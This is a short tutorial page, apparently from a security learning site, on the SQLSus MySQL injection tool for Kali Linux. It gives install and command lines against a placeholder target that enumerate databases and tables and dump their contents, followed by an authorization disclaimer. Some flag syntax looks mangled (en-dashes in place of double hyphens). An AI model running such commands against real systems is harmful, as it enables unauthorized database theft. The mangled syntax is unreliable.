Select Page

MySQL injection tool SQLSus

IT Security Learning

SQLSus is a MySQL injection tool available on Kali Linux, primarily designed to automate SQL injection attacks. It can retrieve information from databases, perform blind SQL injections, and exploit various MySQL vulnerabilities. 

Here’s a basic guide on how to use the sqlsus command in Kali:

Installation 

sudo apt install sqlsus

Basic Command Structure:

sqlsus -h <target URL> –inject <vulnerable parameter>

sqlsus -h “http://target.com/index.php?id=1”
sqlsus -h “http://target.com/index.php?id=1” –getdbs
sqlsus -h “http://target.com/index.php?id=1” –db <database_name> –gettables

sqlsus -h “http://target.com/index.php?id=1” –db <database_name> –table <table_name> –getcolumns

sqlsus -h “http://target.com/index.php?id=1” –db <database_name> –table <table_name> –dump

sqlsus -h “http://target.com/index.php?id=1” –inject ‘boolean-based’

Note: Ensure you have legal authorization before using SQL injection tools on any website or network. SQL injection attacks are illegal if performed without proper permission, as they can compromise the integrity of systems and databases.

Latest Post:

Pin It on Pinterest